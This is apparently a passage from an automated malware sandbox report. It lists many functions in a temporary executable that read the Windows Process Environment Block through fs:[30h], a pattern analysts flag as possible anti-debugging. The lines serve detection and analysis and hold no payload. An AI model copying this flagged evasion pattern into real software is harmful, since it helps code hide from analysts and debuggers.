        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DC330C mov eax, dword ptr fs:[00000030h] 3_2_32DC330C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DC330C mov eax, dword ptr fs:[00000030h] 3_2_32DC330C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DC330C mov eax, dword ptr fs:[00000030h] 3_2_32DC330C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DC330C mov eax, dword ptr fs:[00000030h] 3_2_32DC330C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DFF30A mov eax, dword ptr fs:[00000030h] 3_2_32DFF30A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32E13336 mov eax, dword ptr fs:[00000030h] 3_2_32E13336
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D78322 mov eax, dword ptr fs:[00000030h] 3_2_32D78322
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D78322 mov eax, dword ptr fs:[00000030h] 3_2_32D78322
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D78322 mov eax, dword ptr fs:[00000030h] 3_2_32D78322
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3E328 mov eax, dword ptr fs:[00000030h] 3_2_32D3E328
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3E328 mov eax, dword ptr fs:[00000030h] 3_2_32D3E328
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3E328 mov eax, dword ptr fs:[00000030h] 3_2_32D3E328
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D6332D mov eax, dword ptr fs:[00000030h] 3_2_32D6332D
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D5B0D0 mov eax, dword ptr fs:[00000030h] 3_2_32D5B0D0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3B0D6 mov eax, dword ptr fs:[00000030h] 3_2_32D3B0D6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3B0D6 mov eax, dword ptr fs:[00000030h] 3_2_32D3B0D6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3B0D6 mov eax, dword ptr fs:[00000030h] 3_2_32D3B0D6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3B0D6 mov eax, dword ptr fs:[00000030h] 3_2_32D3B0D6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3C0F6 mov eax, dword ptr fs:[00000030h] 3_2_32D3C0F6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D7D0F0 mov eax, dword ptr fs:[00000030h] 3_2_32D7D0F0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D7D0F0 mov ecx, dword ptr fs:[00000030h] 3_2_32D7D0F0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D390F8 mov eax, dword ptr fs:[00000030h] 3_2_32D390F8
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D390F8 mov eax, dword ptr fs:[00000030h] 3_2_32D390F8
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D390F8 mov eax, dword ptr fs:[00000030h] 3_2_32D390F8
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D390F8 mov eax, dword ptr fs:[00000030h] 3_2_32D390F8
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3A093 mov ecx, dword ptr fs:[00000030h] 3_2_32D3A093
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D3C090 mov eax, dword ptr fs:[00000030h] 3_2_32D3C090
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32E150B7 mov eax, dword ptr fs:[00000030h] 3_2_32E150B7
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32E14080 mov eax, dword ptr fs:[00000030h] 3_2_32E14080
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32E14080 mov eax, dword ptr fs:[00000030h] 3_2_32E14080
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32E14080 mov eax, dword ptr fs:[00000030h] 3_2_32E14080
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32E14080 mov eax, dword ptr fs:[00000030h] 3_2_32E14080
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32E14080 mov eax, dword ptr fs:[00000030h] 3_2_32E14080
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32E14080 mov eax, dword ptr fs:[00000030h] 3_2_32E14080
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32E14080 mov eax, dword ptr fs:[00000030h] 3_2_32E14080
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DFB0AF mov eax, dword ptr fs:[00000030h] 3_2_32DFB0AF
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DEF0A5 mov eax, dword ptr fs:[00000030h] 3_2_32DEF0A5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DEF0A5 mov eax, dword ptr fs:[00000030h] 3_2_32DEF0A5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DEF0A5 mov eax, dword ptr fs:[00000030h] 3_2_32DEF0A5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DEF0A5 mov eax, dword ptr fs:[00000030h] 3_2_32DEF0A5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DEF0A5 mov eax, dword ptr fs:[00000030h] 3_2_32DEF0A5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DEF0A5 mov eax, dword ptr fs:[00000030h] 3_2_32DEF0A5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32DEF0A5 mov eax, dword ptr fs:[00000030h] 3_2_32DEF0A5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D800A5 mov eax, dword ptr fs:[00000030h] 3_2_32D800A5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D41051 mov eax, dword ptr fs:[00000030h] 3_2_32D41051
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D41051 mov eax, dword ptr fs:[00000030h] 3_2_32D41051
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D70044 mov eax, dword ptr fs:[00000030h] 3_2_32D70044
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D46074 mov eax, dword ptr fs:[00000030h] 3_2_32D46074
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D46074 mov eax, dword ptr fs:[00000030h] 3_2_32D46074
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32D47072 mov eax, dword ptr fs:[00000030h] 3_2_32D47072
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Code function: 3_2_32E1505B mov eax, dword ptr fs:[00000030h] 3_2_32E1505B
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DE9060 mov eax, dword ptr fs:[00000030h]3_2_32DE9060
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D65004 mov eax, dword ptr fs:[00000030h]3_2_32D65004
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D65004 mov ecx, dword ptr fs:[00000030h]3_2_32D65004
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D48009 mov eax, dword ptr fs:[00000030h]3_2_32D48009
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3D02D mov eax, dword ptr fs:[00000030h]3_2_32D3D02D
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E081EE mov eax, dword ptr fs:[00000030h]3_2_32E081EE
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E081EE mov eax, dword ptr fs:[00000030h]3_2_32E081EE
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D501C0 mov eax, dword ptr fs:[00000030h]3_2_32D501C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D501C0 mov eax, dword ptr fs:[00000030h]3_2_32D501C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D551C0 mov eax, dword ptr fs:[00000030h]3_2_32D551C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D551C0 mov eax, dword ptr fs:[00000030h]3_2_32D551C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D551C0 mov eax, dword ptr fs:[00000030h]3_2_32D551C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D551C0 mov eax, dword ptr fs:[00000030h]3_2_32D551C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D391F0 mov eax, dword ptr fs:[00000030h]3_2_32D391F0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D391F0 mov eax, dword ptr fs:[00000030h]3_2_32D391F0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D501F1 mov eax, dword ptr fs:[00000030h]3_2_32D501F1
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D501F1 mov eax, dword ptr fs:[00000030h]3_2_32D501F1
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D501F1 mov eax, dword ptr fs:[00000030h]3_2_32D501F1
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6F1F0 mov eax, dword ptr fs:[00000030h]3_2_32D6F1F0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6F1F0 mov eax, dword ptr fs:[00000030h]3_2_32D6F1F0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D491E5 mov eax, dword ptr fs:[00000030h]3_2_32D491E5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D491E5 mov eax, dword ptr fs:[00000030h]3_2_32D491E5
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6B1E0 mov eax, dword ptr fs:[00000030h]3_2_32D6B1E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6B1E0 mov eax, dword ptr fs:[00000030h]3_2_32D6B1E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6B1E0 mov eax, dword ptr fs:[00000030h]3_2_32D6B1E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6B1E0 mov eax, dword ptr fs:[00000030h]3_2_32D6B1E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6B1E0 mov eax, dword ptr fs:[00000030h]3_2_32D6B1E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6B1E0 mov eax, dword ptr fs:[00000030h]3_2_32D6B1E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6B1E0 mov eax, dword ptr fs:[00000030h]3_2_32D6B1E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4A1E3 mov eax, dword ptr fs:[00000030h]3_2_32D4A1E3
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4A1E3 mov eax, dword ptr fs:[00000030h]3_2_32D4A1E3
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4A1E3 mov eax, dword ptr fs:[00000030h]3_2_32D4A1E3
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4A1E3 mov eax, dword ptr fs:[00000030h]3_2_32D4A1E3
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4A1E3 mov eax, dword ptr fs:[00000030h]3_2_32D4A1E3
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D381EB mov eax, dword ptr fs:[00000030h]3_2_32D381EB
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D69194 mov eax, dword ptr fs:[00000030h]3_2_32D69194
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D81190 mov eax, dword ptr fs:[00000030h]3_2_32D81190
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D81190 mov eax, dword ptr fs:[00000030h]3_2_32D81190
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D44180 mov eax, dword ptr fs:[00000030h]3_2_32D44180
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D44180 mov eax, dword ptr fs:[00000030h]3_2_32D44180
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D44180 mov eax, dword ptr fs:[00000030h]3_2_32D44180
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E151B6 mov eax, dword ptr fs:[00000030h]3_2_32E151B6
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D731BE mov eax, dword ptr fs:[00000030h]3_2_32D731BE
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D731BE mov eax, dword ptr fs:[00000030h]3_2_32D731BE
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D741BB mov ecx, dword ptr fs:[00000030h]3_2_32D741BB
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D741BB mov eax, dword ptr fs:[00000030h]3_2_32D741BB
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D741BB mov eax, dword ptr fs:[00000030h]3_2_32D741BB
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7E1A4 mov eax, dword ptr fs:[00000030h]3_2_32D7E1A4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7E1A4 mov eax, dword ptr fs:[00000030h]3_2_32D7E1A4
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7415F mov eax, dword ptr fs:[00000030h]3_2_32D7415F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3A147 mov eax, dword ptr fs:[00000030h]3_2_32D3A147
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3A147 mov eax, dword ptr fs:[00000030h]3_2_32D3A147
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3A147 mov eax, dword ptr fs:[00000030h]3_2_32D3A147
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD314A mov eax, dword ptr fs:[00000030h]3_2_32DD314A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD314A mov eax, dword ptr fs:[00000030h]3_2_32DD314A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD314A mov eax, dword ptr fs:[00000030h]3_2_32DD314A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DD314A mov eax, dword ptr fs:[00000030h]3_2_32DD314A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D9717A mov eax, dword ptr fs:[00000030h]3_2_32D9717A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D9717A mov eax, dword ptr fs:[00000030h]3_2_32D9717A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E15149 mov eax, dword ptr fs:[00000030h]3_2_32E15149
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D46179 mov eax, dword ptr fs:[00000030h]3_2_32D46179
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E13157 mov eax, dword ptr fs:[00000030h]3_2_32E13157
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E13157 mov eax, dword ptr fs:[00000030h]3_2_32E13157
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E13157 mov eax, dword ptr fs:[00000030h]3_2_32E13157
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3F113 mov eax, dword ptr fs:[00000030h]3_2_32D3F113
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D70118 mov eax, dword ptr fs:[00000030h]3_2_32D70118
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6510F mov eax, dword ptr fs:[00000030h]3_2_32D6510F
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4510D mov eax, dword ptr fs:[00000030h]3_2_32D4510D
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DFF13E mov eax, dword ptr fs:[00000030h]3_2_32DFF13E
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D77128 mov eax, dword ptr fs:[00000030h]3_2_32D77128
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D77128 mov eax, dword ptr fs:[00000030h]3_2_32D77128
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D6D6D0 mov eax, dword ptr fs:[00000030h]3_2_32D6D6D0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D406CF mov eax, dword ptr fs:[00000030h]3_2_32D406CF
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DE86C2 mov eax, dword ptr fs:[00000030h]3_2_32DE86C2
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E0A6C0 mov eax, dword ptr fs:[00000030h]3_2_32E0A6C0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DBC6F2 mov eax, dword ptr fs:[00000030h]3_2_32DBC6F2
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DBC6F2 mov eax, dword ptr fs:[00000030h]3_2_32DBC6F2
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D396E0 mov eax, dword ptr fs:[00000030h]3_2_32D396E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D396E0 mov eax, dword ptr fs:[00000030h]3_2_32D396E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4C6E0 mov eax, dword ptr fs:[00000030h]3_2_32D4C6E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D456E0 mov eax, dword ptr fs:[00000030h]3_2_32D456E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D456E0 mov eax, dword ptr fs:[00000030h]3_2_32D456E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D456E0 mov eax, dword ptr fs:[00000030h]3_2_32D456E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D666E0 mov eax, dword ptr fs:[00000030h]3_2_32D666E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D666E0 mov eax, dword ptr fs:[00000030h]3_2_32D666E0
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D48690 mov eax, dword ptr fs:[00000030h]3_2_32D48690
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E086A8 mov eax, dword ptr fs:[00000030h]3_2_32E086A8
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32E086A8 mov eax, dword ptr fs:[00000030h]3_2_32E086A8
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DCC691 mov eax, dword ptr fs:[00000030h]3_2_32DCC691
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32DFF68C mov eax, dword ptr fs:[00000030h]3_2_32DFF68C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D50680 mov eax, dword ptr fs:[00000030h]3_2_32D50680
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D50680 mov eax, dword ptr fs:[00000030h]3_2_32D50680
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D50680 mov eax, dword ptr fs:[00000030h]3_2_32D50680
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D50680 mov eax, dword ptr fs:[00000030h]3_2_32D50680
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D50680 mov eax, dword ptr fs:[00000030h]3_2_32D50680
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D50680 mov eax, dword ptr fs:[00000030h]3_2_32D50680
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D50680 mov eax, dword ptr fs:[00000030h]3_2_32D50680
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D50680 mov eax, dword ptr fs:[00000030h]3_2_32D50680
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D50680 mov eax, dword ptr fs:[00000030h]3_2_32D50680
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D50680 mov eax, dword ptr fs:[00000030h]3_2_32D50680
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D50680 mov eax, dword ptr fs:[00000030h]3_2_32D50680
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D50680 mov eax, dword ptr fs:[00000030h]3_2_32D50680
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D75654 mov eax, dword ptr fs:[00000030h]3_2_32D75654
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7265C mov eax, dword ptr fs:[00000030h]3_2_32D7265C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7265C mov ecx, dword ptr fs:[00000030h]3_2_32D7265C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7265C mov eax, dword ptr fs:[00000030h]3_2_32D7265C
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4965A mov eax, dword ptr fs:[00000030h]3_2_32D4965A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D4965A mov eax, dword ptr fs:[00000030h]3_2_32D4965A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D43640 mov eax, dword ptr fs:[00000030h]3_2_32D43640
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5F640 mov eax, dword ptr fs:[00000030h]3_2_32D5F640
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5F640 mov eax, dword ptr fs:[00000030h]3_2_32D5F640
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D5F640 mov eax, dword ptr fs:[00000030h]3_2_32D5F640
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7C640 mov eax, dword ptr fs:[00000030h]3_2_32D7C640
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D7C640 mov eax, dword ptr fs:[00000030h]3_2_32D7C640
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3D64A mov eax, dword ptr fs:[00000030h]3_2_32D3D64A
        Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeCode function: 3_2_32D3D64A mov eax, dword ptr fs:[00000030h]3_2_32D3D64A
